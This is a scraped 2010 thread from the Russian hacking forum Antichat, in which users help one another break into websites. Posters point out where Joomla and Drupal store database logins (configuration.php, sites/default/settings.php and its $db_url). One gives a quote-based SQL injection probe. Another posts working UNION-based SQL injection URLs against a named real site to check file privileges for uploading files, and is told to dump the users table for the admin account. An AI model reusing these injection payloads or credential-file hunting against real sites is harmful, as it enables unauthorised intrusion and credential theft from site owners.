Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
29.05.2010, 20:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от .:[melkiy]:.
мда
ему нужен файл где хранится хост\логин\пасс для коннекта к бд
ну в джумле это configuration.php a в друпал такое есть? не знаю 
|
|
|
29.05.2010, 20:19
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
.:[melkiy]:. Ну хоть до кого то дошло!!
Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
|
|
|
|
29.05.2010, 20:37
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме:
1096131
Репутация:
45
|
|
2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?
|
|
|
|
29.05.2010, 20:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от DrakonSerg
2 Konqi как можно угадать сайт без малейших намеков? )) или совпадение, или ты экстрасенс, блин... ))
Есть вариант от админки пасс вытащить?
даю гарантию что твой сайт уже несколько раз поимели,в кэше googla хранится, а по поводу админки даже не смотрел
|
|
|
|
29.05.2010, 22:34
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от GOGA075
.:[melkiy]:. Ну хоть до кого то дошло!!
Konqi В друпал таких файлов нету, вот поэтому и спрашиваю!
В Друпал
./sites/default/settings.php
|
|
|
|
29.05.2010, 22:40
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Сообщение от GOGA075
А кто подскажет где в движках Drupal хранятся логин и пароль от БД?
файл /sites/default/settings.php а информация в переменной $db_url
|
|
|
|
30.05.2010, 09:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от DrakonSerg
является ли уязвимым сайт, выдающий на кавычку в первом случае:
во втором случае:
???
вбей 'abcd, если abcd в ошибке будет, то крути.
Насчёт drupal, смотри /sites/название сайта, а вообще может быть любое/settings.php
В default редко бывают доступы.
|
|
|
|
30.05.2010, 12:51
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл? |
|
|
|
30.05.2010, 13:05
|
|
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684
Репутация:
136
|
|
Сообщение от CyberHunter
Скажите как проверить file_priv?
Вот например инъекция:
Код:
http://germanfirms.ru/products.php?id=63+union+select+1+--+
Делаю так:
Код:
http://germanfirms.ru/products.php?id=63+union+select+file_priv+from+mysql.user+where+user='db156426_4'+--+
Не выводит ни 'Y' ни 'N'. Что не так?
И как я понимаю, если будет 'Y', то можно будет залить файл? попробуй таблицу users
там админ
|
|
|
|
30.05.2010, 13:06
|
|
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319
Репутация:
-16
|
|
если мойно помоqите наыти админку
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
